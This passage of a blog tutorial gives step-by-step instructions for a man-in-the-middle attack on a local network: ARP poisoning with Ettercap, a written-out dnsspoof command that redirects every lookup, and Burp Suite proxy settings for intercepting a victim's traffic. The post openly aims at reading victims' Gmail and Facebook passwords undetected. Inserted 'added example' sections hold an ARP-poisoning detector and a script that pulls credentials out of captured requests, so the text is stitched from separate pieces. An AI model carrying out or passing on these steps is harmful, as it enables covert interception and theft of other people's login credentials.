<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>START --> START SNIFFING</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><i style="margin-left: 1em; margin-right: 1em;"><a href="http://4.bp.blogspot.com/-aMl8gorEoxU/T-yXCElQsLI/AAAAAAAAAKQ/SZ9_bORdphE/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://4.bp.blogspot.com/-aMl8gorEoxU/T-yXCElQsLI/AAAAAAAAAKQ/SZ9_bORdphE/s640/12.png" width="640" /></a></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>To check if the ARP poisoning is successful, </i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><i style="margin-left: 1em; margin-right: 1em;"><a href="http://1.bp.blogspot.com/-iMEzbedOfBk/T-yX8qfwhjI/AAAAAAAAAKY/GNl9gM-vceQ/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://1.bp.blogspot.com/-iMEzbedOfBk/T-yX8qfwhjI/AAAAAAAAAKY/GNl9gM-vceQ/s640/13.png" width="640" /></a></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"></span>PLUGINS --> CHK_POISON</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><a href="http://2.bp.blogspot.com/-_LL3n3XKxTk/T-yY0gUyvAI/AAAAAAAAAKg/miH9wrT2wq4/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><i><img border="0" height="358" src="http://2.bp.blogspot.com/-_LL3n3XKxTk/T-yY0gUyvAI/AAAAAAAAAKg/miH9wrT2wq4/s640/14.png" width="640" /></i></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>If the poisoning succeeded, move on;</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>otherwise try disconnecting and reconnecting, or restart Ettercap. You can also confirm it from the victim's side: in its ARP table (arp -a on Windows, arp -n on Linux) the gateway's entry now shows your MAC address, the same MAC as your own entry.</i></span></div>
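<div style="text-align: left;">
<span style="background-color: white; color: red;"><i>As an added example that is not part of the original post: the same check done from the victim's side in code. The script below parses arp -n (Linux) or arp -a (Windows) output, reports which IP changed its MAC between two snapshots and which MAC now sits behind more than one IP, and combines the two into a verdict. Both ARP tables are constructed for this example with made-up addresses; the attacker is the host at .7.</i></span></div>

```python
import re
from collections import defaultdict

# One regex covers both `arp -n` on Linux (00:11:22:33:44:55) and `arp -a` on Windows
# (00-11-22-33-44-55); entries without a MAC, such as "(incomplete)", do not match.
ARP_ENTRY = re.compile(
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\D+?"
    r"(?P<mac>(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2})"
)

# Constructed ARP tables for this example (made-up addresses). BEFORE is the victim's
# table in normal operation; AFTER is the same table once the attacker at .7 has poisoned it.
BEFORE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:11:22:33:44:55   C                     wlan0
192.168.1.7              ether   aa:bb:cc:dd:ee:ff   C                     wlan0
192.168.1.20             ether   de:ad:be:ef:00:20   C                     wlan0
"""
AFTER = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   aa:bb:cc:dd:ee:ff   C                     wlan0
192.168.1.7              ether   aa:bb:cc:dd:ee:ff   C                     wlan0
192.168.1.20             ether   de:ad:be:ef:00:20   C                     wlan0
192.168.1.33                     (incomplete)                              wlan0
"""
# The same poisoned state as Windows `arp -a` would print it.
AFTER_WINDOWS = """\
Interface: 192.168.1.20 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.7           aa-bb-cc-dd-ee-ff     dynamic
"""


def parse_arp_table(text):
    """Map IP -> MAC (lower-case, colon-separated) from arp output of either OS."""
    table = {}
    for line in text.splitlines():
        m = ARP_ENTRY.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower().replace("-", ":")
    return table


def changed_bindings(before, after):
    """IPs whose MAC differs between two snapshots: {ip: (old_mac, new_mac)}."""
    return {ip: (before[ip], after[ip])
            for ip in before if ip in after and before[ip] != after[ip]}


def macs_claiming_several_ips(table):
    """MACs that appear behind more than one IP. A gateway with several addresses
    can do this legitimately, so on its own this is a hint, not proof."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def poison_report(before_text, after_text, gateway_ip):
    """Combine both signals: the gateway's MAC changed, and its new MAC is also
    some other host's MAC. That other host is where the traffic now goes."""
    before, after = parse_arp_table(before_text), parse_arp_table(after_text)
    changed = changed_bindings(before, after)
    report = {"poisoned": False, "gateway_change": changed.get(gateway_ip), "suspect_ips": []}
    if gateway_ip in changed:
        new_mac = changed[gateway_ip][1]
        others = [ip for ip, mac in after.items() if mac == new_mac and ip != gateway_ip]
        report["poisoned"] = bool(others)
        report["suspect_ips"] = others
    return report


if __name__ == "__main__":
    print(poison_report(BEFORE, AFTER, "192.168.1.1"))
```

<div style="text-align: left;">
<span style="background-color: white; color: red;"><i>The snapshot comparison is what makes this reliable: a MAC behind two IPs is only a hint, but the gateway's MAC changing to one that another host on the LAN already uses is the signature of exactly the poisoning Ettercap performs here, and the suspect_ips entry names the host the victim's traffic is now being sent to.</i></span></div>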
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: blue; font-size: x-large;"><b><i><br /></i></b></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: blue; font-size: x-large;"><b><i>STEP 3 (OPTIONAL)</i></b></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: blue; font-size: x-large;"><b><i><br /></i></b></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>If you also want to spoof DNS at the same time, type:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
</div>
<div style="text-align: center;">
<span style="background-color: white;"><i><span class="Apple-tab-span" style="color: red; white-space: pre;"> </span><span style="color: red;"> </span><span style="color: purple; font-size: large;"><b>dnsspoof -i wlan0 > /root/Desktop/dns.txt </b></span></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><i style="margin-left: 1em; margin-right: 1em;"><a href="http://4.bp.blogspot.com/-kMzNKWLr63o/T-yZLgLZcQI/AAAAAAAAAKo/we-1881JtMI/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://4.bp.blogspot.com/-kMzNKWLr63o/T-yZLgLZcQI/AAAAAAAAAKo/we-1881JtMI/s640/15.png" width="640" /></a></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>(The queries dnsspoof answered are logged to dns.txt on /root/Desktop. Note that with no -f hosts file, dnsspoof forges a reply for every address query it sees, answering with your own IP, so every site the victim visits resolves to your machine; give it a hosts file with -f to spoof only the names you choose.)</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i><br /></i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: blue; font-size: x-large;"><b><i>FINAL STEP</i></b></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>Start Burp Suite</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>BACKTRACK --> VULNERABILITY ASSESSMENT --> WEB APPLICATION ASSESSMENT --> WEB APPLICATION PROXIES --> BURPSUITE</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i style="margin-left: 1em; margin-right: 1em;"><a href="http://3.bp.blogspot.com/-hd83hSllW5A/T-yZ5PvKcEI/AAAAAAAAAKw/c2ljHzwyZZs/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://3.bp.blogspot.com/-hd83hSllW5A/T-yZ5PvKcEI/AAAAAAAAAKw/c2ljHzwyZZs/s640/16.png" width="640" /></a></i></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>go to PROXY --> OPTIONS</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>and add proxy listeners on port 80 (HTTP) and port 443 (HTTPS), bound to all interfaces rather than loopback only, with "support invisible proxying" enabled on each: the victim's browser is not configured to use a proxy, so Burp has to accept plain, non-proxy-style requests.</i></span></div>
<div style="text-align: center;">
<span style="color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i style="margin-left: 1em; margin-right: 1em;"><a href="http://2.bp.blogspot.com/-QbATQCi7Tj8/T-yaSu2xdtI/AAAAAAAAAK4/cSDSm9jq_bE/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://2.bp.blogspot.com/-QbATQCi7Tj8/T-yaSu2xdtI/AAAAAAAAAK4/cSDSm9jq_bE/s640/17.png" width="640" /></a></i></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>go to PROXY --> INTERCEPT and click ON :-)</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i style="margin-left: 1em; margin-right: 1em;"><a href="http://3.bp.blogspot.com/-XOs75_A1vvQ/T-yasut4_fI/AAAAAAAAALA/2-mV1C9YMds/s1600/18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://3.bp.blogspot.com/-XOs75_A1vvQ/T-yasut4_fI/AAAAAAAAALA/2-mV1C9YMds/s640/18.png" width="640" /></a></i></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>NOW, WHEN THE VICTIM BROWSES, THE HTTP REQUESTS PASS THROUGH YOU AND SHOW UP IN BURP'S INTERCEPT WINDOW :-)</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>For HTTPS sites the victim's browser warns about Burp's certificate, because Burp's CA is not trusted on the victim's machine; unless the victim clicks through the warning, HTTPS logins stay hidden from you.</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>NOTE: after intercepting the request and reading the password for Gmail, Facebook, etc., ALWAYS REMEMBER TO CLICK "FORWARD"; otherwise the victim</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>will not be able to browse, i.e. his/her page will just keep loading... :D</i></span></div>
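<div style="text-align: left;">
<span style="background-color: white; color: red;"><i>An added example, not from the original post, of what actually leaks when a plaintext HTTP login sits in the intercept window: a parser that pulls form-posted and HTTP Basic credentials out of a raw request as Burp shows it, and flags a body that is shorter than its Content-Length. Both requests are constructed for this example; the host name, field names and credentials are made up.</i></span></div>

```python
import base64
from urllib.parse import parse_qs

# Constructed requests showing what Burp's intercept window holds for a plaintext login
# (made-up host name and credentials; not a real capture).
SAMPLE_FORM_POST = (
    "POST /login HTTP/1.1\r\n"
    "Host: mail.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 49\r\n"
    "\r\n"
    "username=alice%40example.test&password=hunter2%21"
)
SAMPLE_BASIC_AUTH = (
    "GET /inbox HTTP/1.1\r\n"
    "Host: mail.example.test\r\n"
    "Authorization: Basic " + base64.b64encode(b"alice:hunter2").decode() + "\r\n"
    "\r\n"
)

# Field names commonly used by login forms; extend the set as you meet others.
CRED_FIELDS = {"user", "username", "login", "email", "pass", "password", "passwd", "pwd"}


def split_request(raw):
    """Break a raw HTTP/1.1 request into (method, path, headers, body); header names are lower-cased."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def find_credentials(raw):
    """Return the credentials visible in a plaintext request: form fields and/or HTTP Basic auth.

    Sets "_truncated_body" when Content-Length says more body was sent than was captured,
    which is what you see if you read the request before it has fully arrived.
    """
    method, path, headers, body = split_request(raw)
    found = {}

    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        # Basic auth is base64, not encryption: user:password is recovered directly.
        user, _, password = base64.b64decode(auth[6:]).decode("utf-8", "replace").partition(":")
        found["basic_user"], found["basic_password"] = user, password

    content_type = headers.get("content-type", "").split(";", 1)[0].strip().lower()
    if content_type == "application/x-www-form-urlencoded":
        expected = int(headers.get("content-length", len(body)))
        if len(body) < expected:
            found["_truncated_body"] = True
        for name, values in parse_qs(body, keep_blank_values=True).items():
            if name.lower() in CRED_FIELDS:
                found[name] = values[0]          # percent-decoded, e.g. %40 -> @
    return found


if __name__ == "__main__":
    print(find_credentials(SAMPLE_FORM_POST))
    print(find_credentials(SAMPLE_BASIC_AUTH))
```

<div style="text-align: left;">
<span style="background-color: white; color: red;"><i>Everything the parser recovers is sitting in the request in the clear: percent-encoding and base64 are encodings, not protection. The same login over HTTPS reaches you only as TLS records, which is why the certificate warning mentioned above is the real obstacle, not the parsing.</i></span></div>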
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>HAVE FUN !!</i></span></div>
<div style="text-align: center;">
<br /></div>
Abyss Zircanavohttp://www.blogger.com/profile/17618036098642560367noreply@blogger.com0